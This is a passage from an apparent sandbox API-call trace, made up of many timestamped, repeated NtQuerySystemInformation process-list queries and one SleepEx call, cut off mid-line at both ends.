Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19d40) returned 0x0 [0148.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0148.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19e58) returned 0x0 [0149.150] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0152.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 